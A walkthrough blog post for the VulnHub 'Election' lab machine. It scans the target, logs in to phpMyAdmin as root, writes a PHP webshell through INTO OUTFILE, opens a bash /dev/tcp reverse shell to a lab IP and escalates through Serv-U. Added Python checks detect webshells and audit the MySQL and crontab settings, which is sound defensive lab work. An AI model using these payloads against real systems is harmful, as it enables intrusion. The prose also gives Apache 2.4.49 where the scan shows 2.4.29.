vulnhub-wp election

🖳 host discovery

sudo netdiscover -r 192.168.165.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                          

4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.165.14 c6:3b:70:2b:33:1e 2 120 Unknown vendor
192.168.165.196 20:1e:88:ad:fc:55 1 60 Intel Corporate
192.168.165.209 08:00:27:40:48:1a 1 60 PCS Systemtechnik GmbH

The target is 192.168.165.209.

👁 service scan

nmap scan
sudo nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.165.209

···
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
| 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:40:48:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
···

🚪🚶 get shell

The Apache was 2.4.49, but after trying the payload it does not seem to have the path traversal.
We found four paths in robots.txt; only election worked, the others returned 404.
We could also brute-force the phpmyadmin path with dirb:

dirb http://192.168.165.209
···
---- Scanning URL: http://192.168.165.209/ ----
+ http://192.168.165.209/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://192.168.165.209/javascript/
+ http://192.168.165.209/phpinfo.php (CODE:200|SIZE:95563)
==> DIRECTORY: http://192.168.165.209/phpmyadmin/
+ http://192.168.165.209/robots.txt (CODE:200|SIZE:30)
+ http://192.168.165.209/server-status (CODE:403|SIZE:280)
···

We could log in to it with root:toor.

Because secure_file_priv was empty and we are root, we could write a webshell into the web root:

select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/shell.php"

Then visit it in the browser.

Then download a weevely shell onto the web server (generated by weevely):

weevely generate password back.php
  • password is the password used when connecting

Then connect to it.

This shell was not stable or powerful enough, so use

bash -c 'bash -i >& /dev/tcp/192.168.165.130/443 0>&1'
to get a reverse shell.
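Added example (my own Python, not code from the original writeup): a small defender-side check for the two conditions this step relied on. The first function flags PHP files that feed request input straight into an execution sink (the shape of the one-liner written with INTO OUTFILE above); the second classifies a MySQL secure_file_priv value, since an empty value is what let root write into the web root. The sample web root is constructed, not the contents of the target machine.

```python
import os
import re

# Constructed sample web root (path -> PHP source); not files from the target.
# shell.php holds the one-liner the writeup writes via INTO OUTFILE.
SAMPLE_FILES = {
    "/var/www/html/shell.php": "<?php system($_GET['cmd']);?>",
    "/var/www/html/index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
    "/var/www/html/up.php": '<?php passthru( $_POST["c"] ); ?>',
}

# Execution sinks whose argument comes straight from request input.
# Narrow on purpose: a triage pattern for dropped one-liners, not PHP analysis.
_SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
_SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)"
WEBSHELL_RE = re.compile(_SINKS + r"\s*\(\s*" + _SOURCES + r"\s*\[", re.IGNORECASE)


def find_webshell_candidates(files):
    """files: {path: php_source}. Returns the sorted paths whose source feeds
    request input directly into an execution sink."""
    return sorted(path for path, src in files.items() if WEBSHELL_RE.search(src))


def scan_webroot(root):
    """Read every .php file under `root` and run the same check on disk."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return find_webshell_candidates(files)


def assess_secure_file_priv(value):
    """Classify the value reported by SHOW VARIABLES LIKE 'secure_file_priv'.
    ''    -> 'unrestricted': INTO OUTFILE can write wherever mysqld can,
                             including the web root (the situation on this box)
    NULL  -> 'disabled':     import/export statements are refused
    path  -> 'restricted':   writes are confined to that directory
    """
    v = (value or "").strip()
    if v == "":
        return "unrestricted"
    if v.upper() == "NULL":
        return "disabled"
    return "restricted"


if __name__ == "__main__":
    print("webshell candidates:", find_webshell_candidates(SAMPLE_FILES))
    for setting in ("", "NULL", "/var/lib/mysql-files/"):
        print(f"secure_file_priv={setting!r}: {assess_secure_file_priv(setting)}")
```

Run scan_webroot("/var/www/html") on a real web root to triage it; the fix for the MySQL side is to set secure_file_priv to a dedicated directory (or NULL) and to stop using a root account with a trivial password for phpMyAdmin.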

🛡️ PE

Find SUID binaries:
find / -perm -u=s -type f 2>/dev/null

Serv-U was exploitable:
searchsploit Serv-U

Then get the exploit onto the target machine (with wget).

rabbit hole

When I ran linpeas.sh it flagged /var/spool/cron/ as important, and I found a /crontabs/root file there owned by www-data with read/write rights, so I spent a lot of time trying to use it. It all failed: a crontab in this directory must belong to the user it is named after (/crontabs/root must be owned by root), and the directory has drwx-wx--T permissions, so only root can delete or change the file, not even the file's owner! So /crontabs/root never executes, because its owner was www-data rather than root, and www-data cannot change the owner of /crontabs/root.
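Added example (my own Python, not part of the original writeup): the same ownership rule that made this a rabbit hole is also a useful audit signal, since a crontab file whose owner does not match its name was created by someone other than that user. The function below checks a crontab spool listing for that mismatch, for files readable by others, and for the directory losing its sticky bit or becoming world-accessible. The sample listing is constructed; its first entry mirrors the www-data-owned "root" file from the writeup, and the directory mode is the drwx-wx--T reported above.

```python
import os
import pwd
import stat

# Constructed sample listing of /var/spool/cron/crontabs: (filename, owner, mode).
# Not taken from the target; the first entry mirrors the writeup's situation,
# a file named "root" owned by www-data.
SAMPLE_ENTRIES = [
    ("root", "www-data", 0o600),
    ("www-data", "www-data", 0o600),
    ("backup", "backup", 0o644),
]
SAMPLE_DIR_MODE = 0o1730  # drwx-wx--T, the permissions the writeup reports


def audit_crontab_spool(entries, dir_mode):
    """Return a list of (name, finding) tuples. An empty list means the spool
    looks as expected: sticky, not world-accessible, each crontab owned by the
    user it is named after and readable only by its owner."""
    findings = []
    if not dir_mode & stat.S_ISVTX:
        findings.append((".", "no-sticky-bit"))
    if dir_mode & stat.S_IRWXO:
        findings.append((".", "world-accessible"))
    for name, owner, mode in entries:
        if owner != name:
            # cron refuses a crontab whose owner does not match its name (as the
            # writeup found); a mismatch also means another account created it.
            findings.append((name, "owner-mismatch"))
        if mode & 0o077:
            # cron expects 0600; anything readable by group/other is suspicious
            findings.append((name, "mode-too-open"))
    return findings


def collect_entries(spool_dir="/var/spool/cron/crontabs"):
    """Gather (filename, owner, mode) for every regular file in the spool, plus
    the directory mode, ready for audit_crontab_spool(). Needs root to read it."""
    entries = []
    for entry in os.scandir(spool_dir):
        if entry.is_file(follow_symlinks=False):
            st = entry.stat(follow_symlinks=False)
            owner = pwd.getpwuid(st.st_uid).pw_name
            entries.append((entry.name, owner, stat.S_IMODE(st.st_mode)))
    dir_mode = stat.S_IMODE(os.stat(spool_dir).st_mode)
    return entries, dir_mode


if __name__ == "__main__":
    for name, finding in audit_crontab_spool(SAMPLE_ENTRIES, SAMPLE_DIR_MODE):
        print(f"{name}: {finding}")
```

On a live host run audit_crontab_spool(*collect_entries()) as root; a file like the "root" crontab here shows up as owner-mismatch, which is exactly the kind of leftover a web-application compromise leaves behind.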

📖 recommended articles

election download
another’s walkthrough


https://rightevil.github.io/vulnhub-wp-election/
Author: rightevil
Published: March 15, 2024